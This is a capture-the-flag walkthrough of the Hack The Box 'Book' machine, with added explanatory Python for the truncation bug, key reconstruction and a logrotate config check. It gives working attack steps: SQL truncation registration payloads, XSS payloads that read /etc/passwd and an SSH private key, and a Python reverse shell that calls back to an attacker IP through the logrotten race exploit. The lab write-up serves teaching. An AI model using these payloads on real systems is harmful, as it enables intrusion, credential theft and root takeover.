2020-04-15

HTB::Book Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • dirb
  • pspy
  • SQL truncation
  • XSS to LFI (server-side XSS in a dynamically generated PDF)
  • logrotate exploit (logrotten)

0x03 Pentesting

Initial Enumeration

Port scan

# Nmap 7.80 scan initiated Fri Apr  3 22:48:24 2020 as: nmap -sC -sV -Pn -oN ippsec_scan.txt 10.10.10.176
Nmap scan report for 10.10.10.176
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
| 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 3 22:49:38 2020 -- 1 IP address (1 host up) scanned in 73.80 seconds

Directory scan

$ dirb http://10.10.10.176
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Tue Apr 14 02:23:14 2020
URL_BASE: http://10.10.10.176/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

----------------- GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.176/ ----
==> DIRECTORY: http://10.10.10.176/admin/
==> DIRECTORY: http://10.10.10.176/docs/
==> DIRECTORY: http://10.10.10.176/images/

+ http://10.10.10.176/index.php (CODE:200|SIZE:6800)
+ http://10.10.10.176/server-status (CODE:403|SIZE:277)

---- Entering directory: http://10.10.10.176/admin/ ----
==> DIRECTORY: http://10.10.10.176/admin/export/
+ http://10.10.10.176/admin/index.php (CODE:200|SIZE:6291)
==> DIRECTORY: http://10.10.10.176/admin/vendor/

---- Entering directory: http://10.10.10.176/docs/ ----

---- Entering directory: http://10.10.10.176/images/ ----

---- Entering directory: http://10.10.10.176/admin/export/ ----

---- Entering directory: http://10.10.10.176/admin/vendor/ ----
==> DIRECTORY: http://10.10.10.176/admin/vendor/composer/

---- Entering directory: http://10.10.10.176/admin/vendor/composer/ ----

-----------------
END_TIME: Tue Apr 14 04:45:39 2020
DOWNLOADED: 32284 - FOUND: 4

Getting User Access

Port 80 serves a login and registration page. Register and log in normally first and look around the site; three things stand out:

  • The Contact Us page reveals an administrator account, admin@book.htb
  • The View Profile page shows that the current account's role is User
  • The Collections page has an upload feature

First, try vertical privilege escalation: register an account with admin@book.htb and intercept the request with Burp

POST /index.php HTTP/1.1
Host: 10.10.10.176
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.176/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Connection: close
Cookie: PHPSESSID=mq1sob5pmstq0i55csvmlafcre
Upgrade-Insecure-Requests: 1

name=admin&email=admin@book.htb&password=123321

The registration page's source also shows JavaScript validation on the email field:

function validateForm() {
  var x = document.forms["myForm"]["name"].value;
  var y = document.forms["myForm"]["email"].value;
  // Only emptiness is checked client-side; the "not more than 10/20 characters"
  // wording is a hint about the column widths on the server side.
  if (x == "") {
    alert("Please fill name field. Should not be more than 10 characters");
    return false;
  }
  if (y == "") {
    alert("Please fill email field. Should not be more than 20 characters");
    return false;
  }
}

The escalation here is a SQL truncation attack. The server checks whether the submitted email already exists by comparing the full string, so admin@book.htb on its own is rejected as a duplicate. The email column, however, is only 20 characters wide (the alert text gives that away), and MySQL without strict mode silently truncates longer values on INSERT. Pad admin@book.htb with spaces to 20 characters and append one arbitrary character, 21 characters in total: the string differs from the existing email, passes the duplicate check, and is stored as admin@book.htb plus trailing spaces, which the PAD SPACE collations MySQL 5.7 uses by default ignore in comparisons. The result is a second admin@book.htb row with a password we know.

name=admin&email=admin@book.htb      C&password=123321

After registering, logging in to the site with admin@book.htb still shows the role as User, and logging in at http://10.10.10.176/admin answers Nope. One guess is that the name field was also a duplicate, so go through the registration again with a different name:

name=admin2&email=admin@book.htb      C&password=123321
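
The truncation bug, as an added example that is not code from the original write-up or from the target application: a minimal model of the vulnerable registration logic next to a hardened version. The names (UsersTable, register_vulnerable, register_hardened, login) and the in-memory "table" are assumptions; what it models is a MySQL server without STRICT_TRANS_TABLES, a VARCHAR(20) email column, a duplicate check that compares the full submitted string, and a PAD SPACE collation that ignores trailing spaces on comparison.

```python
"""Model of the SQL truncation takeover (added example, not the page's code).

Assumed server behaviour (labelled as such): email is VARCHAR(20), MySQL runs
without strict mode, so over-long values are cut to 20 chars on INSERT, and
'=' comparisons ignore trailing spaces (PAD SPACE collation).
"""

EMAIL_LEN = 20   # width of the assumed `email VARCHAR(20)` column
NAME_LEN = 10    # width hinted at by the "not more than 10 characters" alert


def build_truncation_payload(target_email: str, column_len: int = EMAIL_LEN) -> str:
    """Pad the target with spaces to column_len and append one extra character:
    the value no longer equals the target, but truncates back to it."""
    if len(target_email) > column_len:
        raise ValueError("target is already longer than the column")
    return target_email.ljust(column_len) + "C"


class UsersTable:
    """In-memory stand-in for the users table with MySQL-like semantics."""

    def __init__(self, strict_mode: bool):
        self.strict_mode = strict_mode
        self.rows = []  # each row: {"name", "email", "password"}

    @staticmethod
    def _equal(a: str, b: str) -> bool:
        # PAD SPACE collation: trailing spaces are not significant in '='
        return a.rstrip(" ") == b.rstrip(" ")

    def select_by_email(self, email: str):
        return [r for r in self.rows if self._equal(r["email"], email)]

    def insert(self, name: str, email: str, password: str) -> None:
        if len(email) > EMAIL_LEN:
            if self.strict_mode:
                # strict mode: ERROR 1406 "Data too long for column 'email'"
                raise ValueError("Data too long for column 'email'")
            email = email[:EMAIL_LEN]   # silent truncation in non-strict mode
        self.rows.append({"name": name, "email": email, "password": password})


def register_vulnerable(db: UsersTable, name: str, email: str, password: str) -> bool:
    """Duplicate check on the full submitted string, then INSERT as received."""
    if db.select_by_email(email):
        return False            # "email already exists"
    db.insert(name, email, password)
    return True


def register_hardened(db: UsersTable, name: str, email: str, password: str) -> bool:
    """Enforce the column widths server-side before touching the database.
    Pair this with sql_mode=STRICT_TRANS_TABLES and a UNIQUE index on email."""
    email = email.strip()
    if len(email) > EMAIL_LEN or not (0 < len(name) <= NAME_LEN):
        return False
    if db.select_by_email(email):
        return False
    db.insert(name, email, password)
    return True


def login(db: UsersTable, email: str, password: str):
    """Typical vulnerable login: first row whose email and password match,
    so the attacker's duplicate row is accepted for admin@book.htb."""
    for row in db.select_by_email(email):
        if row["password"] == password:
            return row
    return None


if __name__ == "__main__":
    db = UsersTable(strict_mode=False)
    db.insert("admin", "admin@book.htb", "unknown-admin-password")
    payload = build_truncation_payload("admin@book.htb")
    print(repr(payload), "registered:", register_vulnerable(db, "admin2", payload, "123321"))
    print("login as admin with attacker password:", login(db, "admin@book.htb", "123321"))
```

Running the block shows the 21-character payload being accepted, and login with admin@book.htb and the attacker's password succeeding against the truncated duplicate row; the hardened handler rejects the same payload before it reaches the database, and a strict-mode server rejects the INSERT outright.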

This time logging in to the admin site succeeds. Next, look at the Collections module: from the user side, upload a PDF file with arbitrary content

In the admin panel, download the Collections PDF

The file we just uploaded is listed in it

Stepping back: the data we submit is rendered into that PDF on the server, so whatever generates the PDF is executing our HTML and JavaScript, and we can use the XSS to read local files. A search for "LFI XSS" turns up Noob-ninja's write-up of the technique: https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html

payload:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>

After uploading it, download the Collections PDF from the admin panel again

This gives us a username, reader; next grab the SSH key from that user's home directory

payload:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

The key does not render cleanly in the PDF, though: document.write() drops the text into normal HTML flow, where the line breaks collapse (wrapping the output in <pre>, or base64-encoding it with btoa() before writing, avoids this). Convert the PDF to text with pdfminer.six, whose conversion script is tools/pdf2txt.py:

https://github.com/pdfminer/pdfminer.six

$ python3 tools/pdf2txt.py 68498.pdf > id_rsa
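
Text pulled out of a rendered PDF usually has the key's base64 body re-wrapped at arbitrary positions with stray spaces and page furniture around it, and ssh rejects a PEM file in that state. The following is an added example, not part of the original write-up or of pdfminer.six: it locates the PEM block in the extracted text, strips every whitespace character, checks that what remains is still valid base64, and reflows it to 64-column lines. The sample input is constructed here (96 bytes of counting data, not a real key) to stand in for pdf2txt output.

```python
"""Rebuild a PEM block from PDF-extracted text (added example, not the page's code)."""
import base64
import re

# Header/footer pair with a back-reference so the END label must match BEGIN.
PEM_RE = re.compile(
    r"-----BEGIN (?P<label>[A-Z ]+)-----(?P<body>.*?)-----END (?P=label)-----",
    re.DOTALL,
)


def rebuild_pem(text: str, line_len: int = 64) -> str:
    """Extract the first PEM block from text and reflow its body to line_len."""
    m = PEM_RE.search(text)
    if m is None:
        raise ValueError("no PEM block found in input")
    label = m.group("label").strip()
    # drop every whitespace character the renderer/extractor introduced
    body = re.sub(r"\s+", "", m.group("body"))
    # fail loudly if page text (numbers, headings) leaked into the body
    base64.b64decode(body, validate=True)
    lines = [body[i:i + line_len] for i in range(0, len(body), line_len)]
    return "\n".join([f"-----BEGIN {label}-----", *lines, f"-----END {label}-----"]) + "\n"


# Constructed stand-in for pdf2txt output: NOT a real key, just the bytes
# 0..95 base64-encoded (128 chars), wrapped at odd positions with stray
# spaces and page furniture, the way text extracted from a PDF tends to look.
SAMPLE_B64 = base64.b64encode(bytes(range(96))).decode()


def make_sample_pdf_text() -> str:
    chunks = [SAMPLE_B64[i:i + 37] for i in range(0, len(SAMPLE_B64), 37)]
    return ("Collections\n\n-----BEGIN OPENSSH PRIVATE KEY----- "
            + " \n ".join(chunks)
            + " -----END OPENSSH PRIVATE KEY-----\nPage 1\n")


if __name__ == "__main__":
    import sys
    # usage: python3 tools/pdf2txt.py 68498.pdf | python3 rebuild_pem.py > id_rsa
    data = sys.stdin.read() if not sys.stdin.isatty() else make_sample_pdf_text()
    sys.stdout.write(rebuild_pem(data))
```

The base64 validation matters more than it looks: a page number or the word "Collections" absorbed into the body would produce a file that ssh reports only as "invalid format", with no hint of where the damage is. Remember to chmod 600 the result before using it with ssh -i.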

SSH reader login

$ chmod 600 id_rsa
$ ssh -i id_rsa reader@book.htb
The authenticity of host 'book.htb (10.10.10.176)' can't be established.
ECDSA key fingerprint is SHA256:QRw8pCXg7E8d9sWI+0Z9nZxClJiq9/eAeT/9wUfoQQk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'book.htb' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon Mar 2 15:30:16 UTC 2020

System load: 0.28 Processes: 194
Usage of /: 27.1% of 19.56GB Users logged in: 1
Memory usage: 39% IP address for ens33: 10.10.10.176
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Apr 14 06:05:21 2020 from 10.10.17.235
reader@book:~$ id
uid=1000(reader) gid=1000(reader) groups=1000(reader)
reader@book:~$ ls
backups lse.sh user.txt

Getting Root Access

There is a backups directory in the home directory:

reader@book:~$ cd backups/
reader@book:~/backups$ ls -la
total 12
drwxr-xr-x 2 reader reader 4096 Jan 29 13:05 .
drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 0 Jan 29 13:05 access.log
-rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.1
reader@book:~/backups$ cat access.log.1
192.168.0.104 - - [29/Jun/2019:14:39:55 +0000] "GET /robbie03 HTTP/1.1" 404 446 "-" "curl"

Use pspy to watch what runs on the target:

2020/04/14 10:17:39 CMD: UID=0 PID=78202 | sleep 5
2020/04/14 10:17:44 CMD: UID=0 PID=78205 | /usr/sbin/logrotate -f /root/log.cfg
2020/04/14 10:17:44 CMD: UID=0 PID=78204 | /bin/sh /root/log.sh
2020/04/14 10:17:44 CMD: UID=0 PID=78206 | sleep 5

Every five seconds root runs /root/log.sh, which calls logrotate with -f (forced rotation) and the config /root/log.cfg. Neither file is readable by us, but logrotate running as root is worth probing: when the log it rotates sits in a directory the unprivileged user controls (here ~/backups is owned by reader) and the config uses the create directive, a race condition in logrotate lets the file it creates after rotation be redirected to a location of the attacker's choosing, which is what the logrotten exploit automates. Note that the precondition is write access to the log's directory, not merely to the log file. First confirm that access.log is really the file being rotated: write 10 MB of random data into it and check whether it gets rotated:

reader@book:~/backups$ head -c 10M < /dev/urandom > access.log
reader@book:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader 4096 Jan 29 13:05 .
drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.1
reader@book:~/backups$ ls -la
total 10252
drwxr-xr-x 2 reader reader 4096 Apr 15 02:35 .
drwxr-xr-x 7 reader reader 4096 Jan 29 13:05 ..
-rw-r--r-- 1 reader reader 0 Apr 15 02:35 access.log
-rw-r--r-- 1 reader reader 10485760 Apr 15 02:35 access.log.1
-rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.2

Clearly the rotation happened: the random data moved to access.log.1, the old access.log.1 became access.log.2, and a fresh, empty access.log was created in the directory (the create step the exploit races against), which is why a new access.log.2 appeared.
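
The precondition just described (rotation recreates the log, and the log's directory is writable by us) can be checked mechanically when a logrotate config is readable, for instance on a box where /etc/logrotate.d is open but the rotated logs live under a user-writable path. The following is an added example, not code from the original write-up or from logrotten; it parses logrotate's block syntax, flags blocks that use create and whose log directory the caller can write to, and skips copytruncate/nocreate blocks, which never create a new file. The config text is constructed for the demo as a stand-in for /root/log.cfg, whose real contents are unknown since it is not readable on this box, and the function names are assumptions.

```python
"""Find logrotate blocks exposed to the create-after-rename race (added example)."""
import os
import re

# One block: one or more paths, then `{ ... }`; comments are removed first.
BLOCK_RE = re.compile(r"^\s*(?P<paths>[^{\n]+?)\s*\{(?P<body>.*?)^\s*\}", re.S | re.M)

# Constructed sample, NOT the real /root/log.cfg from the box (which is unreadable).
SAMPLE_CONFIG = """
# rotate the web backup log
/home/reader/backups/access.log {
    daily
    rotate 3
    create 0644 reader reader
    missingok
}
/var/log/other.log {
    weekly
    copytruncate
}
"""


def parse_logrotate_config(text: str) -> dict:
    """Map each log path to the set of directive keywords in its block
    (first word of each non-empty line; arguments such as the mode after
    `create` are dropped). Blocks listing several paths are expanded."""
    text = re.sub(r"#.*", "", text)
    blocks = {}
    for m in BLOCK_RE.finditer(text):
        words = [ln.split() for ln in m.group("body").splitlines()]
        directives = {w[0] for w in words if w}
        for path in m.group("paths").split():
            blocks[path] = directives
    return blocks


def logrotate_race_candidates(config_text: str, writable=os.access) -> list:
    """Return (path, directive) for every log whose rotation is attackable:
    the block uses `create`, so logrotate renames the log and then creates a
    new one, and the log's directory is writable by the caller, so the
    directory can be swapped for a symlink between those two steps.
    `writable(path, os.W_OK)` is injectable so the check can be unit-tested
    without real directories."""
    hits = []
    for path, directives in parse_logrotate_config(config_text).items():
        if "copytruncate" in directives or "nocreate" in directives:
            continue                      # no new file is created: no race
        if "create" not in directives:
            continue                      # nothing recreated after the rename
        if not writable(os.path.dirname(path), os.W_OK):
            continue                      # directory cannot be replaced
        hits.append((path, "create"))
    return hits


if __name__ == "__main__":
    for path, why in logrotate_race_candidates(SAMPLE_CONFIG):
        print(f"candidate: {path} ({why}; directory {os.path.dirname(path)} is writable)")
```

Only per-block directives are considered; a global `create` in /etc/logrotate.conf that applies to included blocks would be missed, so treat an empty result as "not proven" rather than "safe". On the box itself the config is unreadable, which is why the write-up resorts to the empirical test above instead.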

Download the logrotate exploit from https://github.com/whotwagner/logrotten to the attacking machine, upload it to the target's home directory and compile it:

reader@book:~$ gcc -o logrotten logrotten.c

Then prepare a payloadfile containing a reverse shell, and start a listener on the attacking host on the port the payload connects to:

reader@book:~$ cat payloadfile
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.55",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Then run the exploit. logrotten waits for the rotation and, in the window between logrotate renaming access.log and creating the new one, swaps the backups directory for a symlink to its target directory (by default /etc/bash_completion.d/), so the "log" that root creates, filled with payloadfile, lands there and is sourced the next time root starts an interactive bash shell:

reader@book:~$ ./logrotten -p ./payloadfile /home/reader/backups/access.log
Waiting for rotating backups/access.log...

Meanwhile, log in to the target in a second terminal and write random data into the rotated log again (head -c 10M < /dev/urandom > ~/backups/access.log), then watch the listener on the attacking host. The payload above and the listener below were captured in different sessions, so the IP and port differ; in practice they have to match.

$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.15.152] from (UNKNOWN) [10.10.10.176] 50008
# cat /root/root.txt
84da9--------------------0dd89714

0x04 Reference

https://github.com/whotwagner/logrotten

https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf

https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html

Copyright © ca01h 2019-2020